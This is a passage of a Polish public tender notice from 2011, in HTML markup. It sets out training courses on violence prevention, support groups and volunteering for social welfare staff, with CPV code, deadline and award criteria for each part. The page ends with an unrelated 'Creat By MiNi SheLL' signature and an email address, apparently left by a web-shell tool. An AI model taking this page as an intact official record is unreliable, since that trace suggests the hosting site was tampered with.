Szkolenia będą przeprowadzone w terminach: II-IV  tydzień maja 2011 r.

Szkolenie nr 7:
Reorganizacja DPS w oparciu o model duński, w ramach którego Wykonawca przeszkoli: 
3 grupy w trzech domach pomocy społecznej na terenie województwa małopolskiego, 
w każdej z grup po 15 godzin szkoleniowych. Szkolenia będą przeprowadzone 
w terminach: od maja do listopada 2011 r. (w terminach ustalonych z Dyrektorami placówek wskazanych przez Zamawiającego, z zachowaniem zasad określonych w § 3 umowy, której wzór stanowi Część II SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie w przeprowadzaniu szkoleń - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga, aby szkolenia obejmowały następujące bloki tematyczne
Szkolenie nr 8:
Budowanie współpracy interdyscyplinarnej przeciw przemocy, w ramach którego Wykonawca przeprowadzi dwa szkolenia, łącznie dla 40 osób, po 20 osób w grupie, w cyklu dwudniowym, obejmującym po 16 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: IV i V tydzień maja 2011 r.

Szkolenie nr 9:
Prowadzenie grupy wsparcia dla osób doświadczających przemocy, w ramach którego Wykonawca przeprowadzi jedno szkolenie dla 20 osób, w cyklu dwudniowym obejmującym 16 godz. szkoleniowych.
Szkolenia będą przeprowadzone w terminach: V tydzień czerwca i I tydzień lipca 2011 r.

Szkolenie nr 10:
Podejście skoncentrowane na rozwiązaniach w pomocy społecznej, w ramach którego Wykonawca przeprowadzi jedno szkolenie dla 18 osób, w cyklu sześciodniowym obejmującym 36 godz. szkoleniowych.
Szkolenie będzie przeprowadzone w terminach: I i II tydzień czerwca 2011 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie w przeprowadzaniu szkoleń - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga, aby szkolenia obejmowały następujące bloki tematyczne
Szkolenie nr 11:
Wolontariat w pracy socjalnej - możliwości wolontariatu w działaniach ośrodka pomocy społecznej, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym, po 8 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: IV tydzień maja, III tydzień czerwca 2011 r.

Szkolenie nr 12:
Wolontariat w jednostkach pomocy społecznej, w ramach którego Wykonawca przeprowadzi dwa szkolenia łącznie dla 40 osób, po 20 osób w każdej grupie, w cyklu jednodniowym, po 8 godz. szkoleniowych dla każdej grupy.
Szkolenia będą przeprowadzone w terminach: V tydzień czerwca 2011 r.

Szczegółowy opis przedmiotu zamówienia znajduje się w Części III SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie w przeprowadzaniu szkoleń - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com